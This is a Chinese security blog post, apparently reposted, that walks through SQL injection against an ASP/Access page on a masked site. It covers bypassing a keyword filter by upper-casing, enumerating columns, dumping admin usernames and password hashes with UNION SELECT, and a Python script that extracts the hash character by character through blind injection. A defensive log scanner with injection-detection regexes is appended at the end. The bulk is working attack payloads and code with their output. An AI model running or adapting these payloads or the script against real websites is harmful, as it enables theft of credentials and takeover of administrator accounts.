  • Web Security: ACCESS Injection and a Blind Injection Script

    http://www.xxx.cn/cp.asp?classid=3
    http://www.xxx.cn/cp.asp?classid=3 and //the keyword is filtered
    http://www.xxx.cn/cp.asp?classid=3 AND 1=1 //upper case gets past the filter
    http://www.xxx.cn/cp.asp?classid=3 AND 1=2
    http://www.xxx.cn/cp.asp?classid=3 ORDER BY 8%16 //normal
    http://www.xxx.cn/cp.asp?classid=3 ORDER BY 9%16 //error
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,2,3,4,5,6,7,8 FROM ADMIN%16 //returns normally and column 2 is displayed, so the admin table exists
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,id,3,4,5,6,7,8 FROM ADMIN%16 //returns 4, 5, 7: three users with IDs 4, 5 and 7

    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 1 1,admin,3,4,5,6,7,8 FROM ADMIN%16 //lxiaofu
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 2 1,admin,3,4,5,6,7,8 FROM ADMIN%16 //admin
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 3 1,admin,3,4,5,6,7,8 FROM ADMIN%16 //admin8
    or
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 FROM ADMIN WHERE id=4%16 //lxiaofu
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 FROM ADMIN WHERE id=5%16 //admin
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 FROM ADMIN WHERE id=7%16 //admin8
    or alternatively
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 FROM ADMIN%16 //dumps admin, admin8, lxiaofu

    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,pwd,3,4,5,6,7,8 FROM ADMIN%16 //dumps 4817cc8dcbb3fb5, ae0284ccc20bdde, bbd06203b2ba922


    Results so far:
    id admin pwd
    4 lxiaofu bbd06203b2ba922
    5 admin ae0284ccc20bdde
    7 admin8 4817cc8dcbb3fb5

    But the MD5 hashes above are all 15 characters, whereas they should be 16 or 32:

    First check the length of the pwd field:
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,LEN(pwd),3,4,5,6,7,8 FROM ADMIN%16 //returns 16, so the hash is 16 characters

    Knowing the hash is 16 characters, extract the 16th character, filtering by ID:
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,MID(pwd,16,1),3,4,5,6,7,8 FROM ADMIN WHERE id=4%16 //f
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,MID(pwd,16,1),3,4,5,6,7,8 FROM ADMIN WHERE id=5%16 //8
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,MID(pwd,16,1),3,4,5,6,7,8 FROM ADMIN WHERE id=7%16 //c
    or
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,(SELECT MID(pwd,16,1) FROM admin WHERE id=4),3,4,5,6,7,8 FROM ADMIN%16 //f
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,(SELECT MID(pwd,16,1) FROM admin WHERE id=5),3,4,5,6,7,8 FROM ADMIN%16 //8
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,(SELECT MID(pwd,16,1) FROM admin WHERE id=7),3,4,5,6,7,8 FROM ADMIN%16 //c


    Results so far:
    id admin pwd
    4 lxiaofu bbd06203b2ba922f
    5 admin 4817cc8dcbb3fb58
    7 admin8 ae0284ccc20bddec


    Or use a test blind injection script:

    import requests

    heads = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) Gecko/20100101 Firefox/52.0'}
    # candidate characters for each position of the hash
    payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'

    pwd = []

    for i in range(1, 17):  # the hash is 16 characters long (see LEN(pwd) above)
        for payload in payloads:
            url = "http://www.xxx.cn/cp.asp?classid=24 AND ASC((SELECT TOP 1 MID(pwd,{},1) FROM admin))={}".format(i, ord(payload))
            response = requests.get(url=url, headers=heads).content.decode(encoding='gbk')
            # print(url)
            # a true condition returns the normal page, which contains this string
            if "?Product_ID=194" in response:
                pwd.append(payload)
                print('\n', 'pwd is:', payload, end='')
                break
            else:
                print('.', end='')
    print('\n [Done] pwd:', ''.join(pwd))
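As an added defensive counterpart (example code, not part of the original post), the Python below scans constructed web-server log lines for the request patterns used in this walkthrough: it URL-decodes and lower-cases the query before matching, so the upper-case AND trick above makes no difference, flags the appended %16 control byte and a non-integer classid, and counts ASC(MID(...)) probes per client, since the blind script needs up to one request per candidate character and position. The log lines, client addresses and the probe threshold are all constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (combined log format, not from the original post), modelled on the
# walkthrough: a clean request, the lower-case "and" the filter caught, the upper-case AND 1=1
# that got past it, a UNION SELECT probe ending in the %16 byte, and two ASC(MID(pwd,i,1)) probes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0800] "GET /cp.asp?classid=3 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:01 +0800] "GET /cp.asp?classid=3%20and HTTP/1.1" 403 0
10.0.0.9 - - [01/Jan/2020:10:00:02 +0800] "GET /cp.asp?classid=3%20AND%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:03 +0800] "GET /cp.asp?classid=3%20UNION%20SELECT%201,2,3,4,5,6,7,8%20FROM%20ADMIN%16 HTTP/1.1" 200 5200
10.0.0.9 - - [01/Jan/2020:10:00:04 +0800] "GET /cp.asp?classid=24%20AND%20ASC((SELECT%20TOP%201%20MID(pwd,1,1)%20FROM%20admin))=97 HTTP/1.1" 200 4800
10.0.0.9 - - [01/Jan/2020:10:00:04 +0800] "GET /cp.asp?classid=24%20AND%20ASC((SELECT%20TOP%201%20MID(pwd,1,1)%20FROM%20admin))=98 HTTP/1.1" 200 4800
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Rules run on the URL-decoded, lower-cased, whitespace-collapsed query, so letter case is irrelevant.
RULES = {
    "union_select": re.compile(r"\bunion\s+select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "boolean_tautology": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "blind_char_probe": re.compile(r"\basc\s*\(\s*\(?\s*select\b.*\bmid\s*\("),
    "dangling_keyword": re.compile(r"\b(and|or)\s*$"),
}
CONTROL_RE = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f]")  # e.g. the %16 appended to each statement

def analyze_line(line):
    """Return (ip, path, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    decoded = unquote(parts.query)
    norm = " ".join(decoded.lower().split())
    findings = [name for name, rx in RULES.items() if rx.search(norm)]
    if CONTROL_RE.search(decoded):
        findings.append("control_char")
    params = parse_qsl(parts.query, keep_blank_values=True)
    if any(k == "classid" and not v.strip().isdigit() for k, v in params):
        findings.append("non_numeric_classid")  # cp.asp only ever needs an integer here
    return m.group("ip"), parts.path, findings

def analyze_log(text, blind_threshold=2):
    """Per-line findings, plus clients whose ASC(MID(...)) probe count reaches the threshold."""
    results = [r for r in (analyze_line(ln) for ln in text.splitlines()) if r]
    probes = Counter(ip for ip, _, found in results if "blind_char_probe" in found)
    return results, sorted(ip for ip, n in probes.items() if n >= blind_threshold)
```

The non_numeric_classid check is the one that matters most for a parameter like this: whitelisting an integer catches every variant above regardless of keyword spelling, whereas the keyword rules only describe what has already been seen.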
    

      

  • Original source: https://www.cnblogs.com/i-honey/p/8006870.html